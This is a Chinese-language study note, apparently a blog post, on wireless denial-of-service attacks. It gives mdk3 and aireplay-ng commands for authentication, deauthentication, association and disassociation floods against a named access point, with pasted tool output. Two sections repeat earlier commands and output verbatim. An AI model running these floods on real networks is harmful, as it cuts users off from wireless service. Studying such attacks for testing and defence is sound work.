常见无线DOS攻击
記錄下自己最近一段時間對無線滲透學習的筆記。
無線DOS就是無線拒絕服務攻擊。主要包括以下幾種攻擊類型:Auth Dos攻擊、Deauth Flood攻擊、Disassociate攻擊及RF干擾攻擊等。
無線DOS工具:MDK3、Charon(MDK3圖形界面)、aireplay-ng
無線客戶端狀態:IEEE 802.11定義了一種客戶端狀態機制,用于跟蹤工作站身份驗證和關聯狀態。
一、Auth Flood攻擊
Auth Flood攻擊:即身份驗證洪水攻擊。該攻擊目標主要針對那些處于通過驗證、和AP建立關聯的關聯客戶端,攻擊者將向AP發送大量偽造的身份驗證請求幀(偽造的身份驗證服務和狀態代碼),當收到大量偽造的身份驗證請求超過所能承受的能力時,AP將斷開其他無線服務連接
攻擊步驟:
1 使用airodump-ng wlan0mon 查看當前無線網絡狀況
2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 [-s]
其中:
a:表示的是authentication DOS模式
-a:攻擊指定的AP,此處輸入的是AP的MAC地址
-s:發送數據包速率
當攻擊成功后,指定的AP會有很多的不存在的無線站點與之聯系。
1 airodump-ng wlan0mon命令窗口
結果如下:
CH 9 ][ Elapsed: 3 mins ][ 2017-04-29 16:23 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8:15:0D:2D:CB:58 -31 112 163 0 11 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8:15:0D:2D:CB:58 F8:F2:BC:C6:51:5D 0 0 - 1 0 1 D8:15:0D:2D:CB:58 F3:40:CE:5E:A1:8A 0 0 - 0 0 1 D8:15:0D:2D:CB:58 BC:1A:0E:BD:3F:D1 0 0 - 0 0 1 D8:15:0D:2D:CB:58 32:5B:DC:7C:DE:9F 0 0 - 1 0 1 D8:15:0D:2D:CB:58 A7:31:EC:CF:2B:5C 0 0 - 0 0 1 D8:15:0D:2D:CB:58 AA:87:1B:45:07:C5 0 0 - 1 0 1 D8:15:0D:2D:CB:58 16:EF:9B:80:A9:63 0 0 - 1 0 1 D8:15:0D:2D:CB:58 AE:C1:8E:C0:B6:26 0 0 - 1 0 1 D8:15:0D:2D:CB:58 84:3C:B5:5D:E1:00 0 0 - 1 0 1 D8:15:0D:2D:CB:58 C9:80:8B:1A:8F:7E 0 0 - 1 0 1 D8:15:0D:2D:CB:58 D9:A3:50:0F:F2:40 0 0 - 0 0 1 D8:15:0D:2D:CB:58 79:C5:24:71:A8:5E 0 0 - 0 0 1 D8:15:0D:2D:CB:58 20:EB:6C:93:84:56 0 0 - 1 0 1
2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 命令窗口如下:
Device is still responding with 304500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 305000 clients connected! Connecting Client: F8:3B:97:58:E8:AF to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 305500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 306000 clients connected! Connecting Client: 5E:08:C2:3A:77:49 to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 306500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 307000 clients connected! Connecting Client: 8D:BC:1B:E5:24:C7 to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 307500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE!
3 抓包查看無線流量情況
二、Deauth Flood攻擊
Deauth Flood攻擊即為取消驗證洪水攻擊,它旨在通過欺騙從AP到客戶端單播地址的取消身份驗證幀來將客戶端轉為未關聯/未認證的狀態。對于目前的工具來說,這種形式的攻擊在打斷客戶無線服務方面非常有效和快捷。一般來說,在攻擊者發送另一個取消身份驗證幀之前,客戶端會重新關聯和認證以再次獲取服務。攻擊者反復欺騙取消身份驗證幀才能使所有客戶端持續拒絕服務。
攻擊步驟:
1 使用airodump-ng wlan0mon來查看當前無線網絡狀況
2 mdk3 wlan0mon d -c 1[,6,11] [-w file1 -b file2] 或也可以使用aireplay-ng -0 0來完成deauth 攻擊
其中:
d:表示的是deauthentication/disassociation攻擊模式
-c:針對的是無線網絡工作頻道,這里選擇為1
-w:file白名單模式,w就是白名單的簡寫,即后跟文件中包含AP的MAC會在攻擊中回避
-b:file黑名單模式,b就是黑名單的簡寫,即后跟預攻擊目標AP的MAC列表
攻擊成功后,所屬信道的AP的客戶端會斷開連接
1 airodump-ng wlan0mon 命令窗口,結果如下:
CH 14 ][ Elapsed: 6 mins ][ 2017-04-29 16:54 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8:15:0D:2D:CB:58 -63 683 1186 0 11 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8:15:0D:2D:CB:58 FF:FF:FF:FF:FF:FF 0 0 - 0 0 8 D8:15:0D:2D:CB:58 20:82:C0:A9:E2:A6 0 1e- 0 0 147 D8:15:0D:2D:CB:58 5C:E0:C5:1A:17:C9 -52 0 - 1e 0 33 D8:15:0D:2D:CB:58 00:5A:13:2F:04:A0 -42 0e- 1e 0 1644
2 mdk3 wlan0mon d -c 11
Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5:00:0C:A0 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5:00:0C:A0 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11
3 抓包查看無線流量情況
三、Association Flood攻擊
Association Flood攻擊即為關聯洪水攻擊。在無線路由器或者接入點內置一個列表即為連接狀態表,里面可顯示出所有與該AP建立連接的無線客戶端狀態。它試圖通過利用大量模仿和偽造的無線客戶端關聯來填充AP的客戶端關聯表,從而達到淹沒AP的目的。
由于開放身份驗證(空身份驗證)允許任何客戶端通過身份驗證后關聯。利用這種漏洞的攻擊者可以通過創建多個到達已連接或已關聯的客戶端來模仿很多客戶端,從而淹沒目標AP的客戶端關聯表。
攻擊步驟:
1 使用airodump-ng wlan0mon 查看當前無線網絡狀況
2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 [-s]
其中:
a:表示的是authentication DOS模式
-a:攻擊指定的AP,此處輸入的是AP的MAC地址
-s:發送數據包速率
當攻擊成功后,指定的AP會有很多的不存在的無線站點與之聯系。
1 airodump-ng wlan0mon命令窗口
結果如下
CH 9 ][ Elapsed: 3 mins ][ 2017-04-29 16:23 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8:15:0D:2D:CB:58 -31 112 163 0 11 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8:15:0D:2D:CB:58 F8:F2:BC:C6:51:5D 0 0 - 1 0 1 D8:15:0D:2D:CB:58 F3:40:CE:5E:A1:8A 0 0 - 0 0 1 D8:15:0D:2D:CB:58 BC:1A:0E:BD:3F:D1 0 0 - 0 0 1 D8:15:0D:2D:CB:58 32:5B:DC:7C:DE:9F 0 0 - 1 0 1 D8:15:0D:2D:CB:58 A7:31:EC:CF:2B:5C 0 0 - 0 0 1 D8:15:0D:2D:CB:58 AA:87:1B:45:07:C5 0 0 - 1 0 1 D8:15:0D:2D:CB:58 16:EF:9B:80:A9:63 0 0 - 1 0 1 D8:15:0D:2D:CB:58 AE:C1:8E:C0:B6:26 0 0 - 1 0 1 D8:15:0D:2D:CB:58 84:3C:B5:5D:E1:00 0 0 - 1 0 1 D8:15:0D:2D:CB:58 C9:80:8B:1A:8F:7E 0 0 - 1 0 1 D8:15:0D:2D:CB:58 D9:A3:50:0F:F2:40 0 0 - 0 0 1 D8:15:0D:2D:CB:58 79:C5:24:71:A8:5E 0 0 - 0 0 1 D8:15:0D:2D:CB:58 20:EB:6C:93:84:56 0 0 - 1 0 1
2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 命令窗口如下:
Device is still responding with 304500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 305000 clients connected! Connecting Client: F8:3B:97:58:E8:AF to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 305500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 306000 clients connected! Connecting Client: 5E:08:C2:3A:77:49 to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 306500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 307000 clients connected! Connecting Client: 8D:BC:1B:E5:24:C7 to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 307500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE!
3 抓包查看無線流量情況
另外一種攻擊模式就是攻擊者集合了大量的無線網卡,或者是改裝的集合大量無線網卡芯片的捆綁式發射機(類似于常說的“短信群發器”),如果進行大規模連接攻擊,對于目前廣泛使用的無線接入設備,也是很有效果的。
四、Disassociation Flood攻擊
Disassociation Flood攻擊即為取消關聯洪水攻擊,和deauthenticaiton flood攻擊表現方式很相似。它通過欺騙從AP到客戶端的取消關聯幀來強制客戶端成為未關聯/未認證的狀態。一般來說,在攻擊者發送另一個取消關聯幀之前,客戶端會重新關聯以再次獲取服務。攻擊者反復欺騙取消關聯幀才能使客戶端持續拒絕服務。
Disassociation Broadcast攻擊和Disassociation Flood攻擊原理基本一致,只是在發送程度及使用工具上有所區別,前者很多時候用于配合進行無線中間人攻擊,而后者常用于目標確定的點對點無線DOS,比如破壞或干擾指定機構或部門的無線接入點等。
攻擊步驟:
1 使用airodump-ng wlan0mon來查看當前無線網絡狀況
2 mdk3 wlan0mon d -c 1[,6,11] [-w file1 -b file2]
其中:
d:表示的是deauthentication/disassociation攻擊模式
-c:針對的是無線網絡工作頻道,這里選擇為1
-w:file白名單模式,w就是白名單的簡寫,即后跟文件中包含AP的MAC會在攻擊中回避
-b:file黑名單模式,b就是黑名單的簡寫,即后跟預攻擊目標AP的MAC列表
攻擊成功后,所屬信道的AP的客戶端會斷開連接
1 airodump-ng wlan0mon 命令窗口,結果如下:
CH 14 ][ Elapsed: 6 mins ][ 2017-04-29 16:54 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8:15:0D:2D:CB:58 -63 683 1186 0 11 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8:15:0D:2D:CB:58 FF:FF:FF:FF:FF:FF 0 0 - 0 0 8 D8:15:0D:2D:CB:58 20:82:C0:A9:E2:A6 0 1e- 0 0 147 D8:15:0D:2D:CB:58 5C:E0:C5:1A:17:C9 -52 0 - 1e 0 33 D8:15:0D:2D:CB:58 00:5A:13:2F:04:A0 -42 0e- 1e 0 1644
2 mdk3 wlan0mon d -c 11
Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5:00:0C:A0 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5:00:0C:A0 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11
3 抓包查看無線流量情況
五、RF Jamming攻擊
RF Jamming攻擊即為RF干擾攻擊。該攻擊是通過發出干擾射頻達到破壞正常無線通信的目的。而前面幾種攻擊主要是基于無線通信過程及協議的。RF為射頻,主要包括無線信號發射機及收信機等。
這里因環境限制身旁沒有測試設備,所以具體的數據包無法展示,后面有機會再單獨展開。
總結
- 上一篇: 网络基础 ------ 制作网线
- 下一篇: 安卓外包公司——技术分享:手机应用开发步